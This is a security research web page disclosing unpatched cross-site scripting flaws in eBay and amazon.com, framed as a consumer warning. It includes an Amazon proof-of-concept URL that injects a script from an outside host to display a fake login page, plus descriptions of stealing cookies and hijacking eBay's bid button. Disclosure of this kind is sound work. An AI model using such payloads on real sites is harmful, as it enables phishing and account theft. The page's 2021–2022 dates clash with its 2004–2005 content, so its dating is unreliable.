Search | Research | Contact Us Tuesday October 10, 2021
Languages
Most Viewed Items
  1 PHPXMLRPC Library Remote Code Execution
  2 XOOPS 2.0.11 && Earlier Multiple Vulnerabilities
  3 Multiple Invision Power Board Vulnerabilities
  4 Mambo Multiple Vulnerabilities
  5 eBay And Amazon Still Vulnerable
  6 PEAR XML_RPC Library Remote Code Execution
  7 When Small Mistakes Can Cause Big Problems
  8 Woltlab Burning Board SQL Injection Vulnerability
  9 WordPress 1.5.1.2 And Earlier Multiple Vulnerabilities
10 MySQL Eventum Multiple Vulnerabilities
Need Secure Code?
Quick Search
You can use the form below to search our site. Just enter the keywords to search.
Home Services Archives Research Downloads Contact
eBay And Amazon Still Vulnerable
January 4, 2022


With the holidays over and everyone heading back to work many people are breathing a sigh of relief. With the holiday rush over, and a new year ahead you probably give no thought to the question of "Was my online holiday shopping done safely and securely?". Unfortunately the answer to this question could very well be no. Despite millions and millions of dollars being spent each and every year by big name online ecommerce outfits a good number still remains vulnerable to security flaws.


False Sense Of Security
It seems that a lot of the trust put into these websites comes from the company's reputation. For example: you would probably feel a lot safer about doing your online shopping at amazon.com as opposed to thelocalcornerstore.com, and it is this type of trust that could cause you problems.

Last year GulfTech Security Research found several security flaws in eBay and the eBay owned half.com. These security flaws could allow attackers to execute malicious code in the context of a victim's browser, and could easily be used to hijack accounts, and in phishing, and other scams. Unfortunately only some of those security flaws were fixed, and the most dangerous of the bunch still remain even after being made public. Additionally, GulfTech Security Research found similar security vulnerabilities in the well known amazon.com website. Like eBay, the amazon.com vulnerabilities still exist.


Should I Be Worried?
If you make use of eBay or amazon.com you could be put at risk simply by visiting a link, or viewing a malicious web page. The eBay vulnerability is an especially nasty one because all an attacker has to do in order to acquire victims is place an auction or fill out their "about me" page with malicious data. Once the malicious auction is placed a victim's cookie based credentials can be stolen silently, and even worse an attacker can hijack certain Document Object Model elements and cause anyone who clicks on the "place bid" button to be redirected to a bogus login page or worse. Below is an example "about me" page put together by us that will demonstrate how this vulnerability could be used for phishing.

http://members.ebay.com/ws/eBayISAPI.dll?ViewUserPage&userid;=jahmin79

If the above link does not work properly for you, then you can see screenshots of the vulnerability being exploited by visiting one of the following links.

http://images.gulftech.org/domhijackebay.jpg
http://images.gulftech.org/domhijackedebay.jpg


eBay is not the only big name with security problems though. As we mentioned earlier amazon.com is still vulnerable to an issue GulfTech Security Research discovered and made public many months ago. The vulnerability in Amazon is a little different, but allows for similar results. GulfTech Security Research has provided a Proof Of Concept for this issue. It is buggy, but not meant to steal your information, just show you that the issue does exist and can be exploited.
http://www.amazon.com/exec/obidos/ASIN/B00009TB5G/%22%3E%22;//--%3E%3C/script%3E
%3Cscript%20src=http://tmp.gulftech.org/amazon.js%3E%3C/script%3Eref=pd_cpt_gw_1
/002-2134680-7978406
The above link would replace the amazon.com page with an attacker's page, which in this case is a fake amazon.com log in page. Below are screenshots of the issue in action.

http://images.gulftech.org/amazona.jpg
http://images.gulftech.org/amazonb.jpg


The issue in amazon seems to be with the handling of user supplied data to the reviews and suggestion box feature. Pages with this present are probably vulnerable.


When Will it Be Fixed?
Unfortunately, it seems that with some large companies, things tend to get overlooked. All of the issues mentioned here have been public for some time. There is not anyone who knows for sure when and if these holes will be patched, but lets hope it gets done before it is exploited to take advantage of the end users. filtering all inputted data for DOM references along with javascript and frames.


References
Document Object Model Hijacking Explained
http://www.gulftech.org/?node=article&article;_id=00055-12182004

When Small mistakes Cause Big Problems
http://www.gulftech.org/?node=article&article;_id=00050-09182004